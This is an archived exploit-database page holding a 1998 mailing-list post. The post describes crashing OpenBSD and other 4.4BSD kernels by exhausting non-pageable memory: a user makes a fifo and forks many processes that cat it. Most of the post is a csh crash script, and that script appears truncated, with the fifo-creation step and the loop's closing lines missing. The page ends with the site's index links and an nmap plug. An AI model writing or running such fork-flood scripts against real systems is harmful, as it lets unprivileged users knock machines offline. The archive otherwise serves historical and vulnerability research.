You can run the *BSD kernel out of non-pageable memory by making a fifo (via mkfifo) and forking a bunch of processes trying to cat it.
Jason Downs <downsj@DOWNSJ.COM>
Crash the system (stupid DOS attack)
OpenBSD, presumably NetBSD, FreeBSD, BSDI
25 January 1998
Date: Sun, 25 Jan 1998 15:54:25 -0800
From: Jason Downs <downsj@DOWNSJ.COM>
Subject: Simple OpenBSD crash script
Here is a rather simple method of crashing most OpenBSD systems (and, I
assume, NetBSD or anything else running 4.4BSD vm without this problem fixed).
Most, if not all, kernels have process limits high enough for a normal
user to run the kernel out of non-pageable map entries. The easiest way
that I have found to do this is with the enclosed script.
If the per-user process/descriptor limits are high enough, running this script
will result in a kernel panic.
set path = ( /usr/bin /usr/sbin /bin /sbin )
if ( -e fifo ) then
while ( 1 )
cat fifo >& /dev/null &
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: